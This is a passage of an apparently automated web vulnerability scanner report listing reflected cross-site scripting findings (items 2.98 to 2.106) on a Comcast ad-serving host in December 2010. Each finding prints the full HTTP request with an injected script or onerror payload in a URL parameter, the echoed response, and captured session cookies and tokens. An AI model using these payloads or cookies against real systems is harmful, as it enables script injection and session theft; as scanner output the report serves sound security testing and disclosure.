2.98. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126b9"><script>alert(1)</script>0c7d718d7cb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/1460830530/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.99. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831fb"><script>alert(1)</script>848b3831af8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 781
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/L/982068884/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.100. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d was submitted in the REST URL parameter 9. This input was echoed as e696a"><img src=a onerror=alert(1)>850fbda351d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/345184688/x32e696a"><img src=a onerror=alert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3bc2"><script>alert(1)</script>e45d8e81862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?a3bc2"><script>alert(1)</script>e45d8e81862=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
ream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1924789161/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&a3bc2"><script>alert(1)</script>e45d8e81862=1" WIDTH=2 HEIGHT=2>

2.102. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48f11"><script>alert(1)</script>19550cf6058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/1234034443/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.103. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69b0"><script>alert(1)</script>b11efa66307 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 779
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/991764332/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.104. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1313"><script>alert(1)</script>84290a6437b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 777
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/6859924/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.105. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c22ec"><script>alert(1)</script>bf352f0d2a0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 781
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/L/308597502/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.106. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf was submitted in the REST URL parameter 9. This input was echoed as aae3c"><img src=a onerror=alert(1)>24f9f614caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 783
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1484827575/x32aae3c"><img src=a onerror=alert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

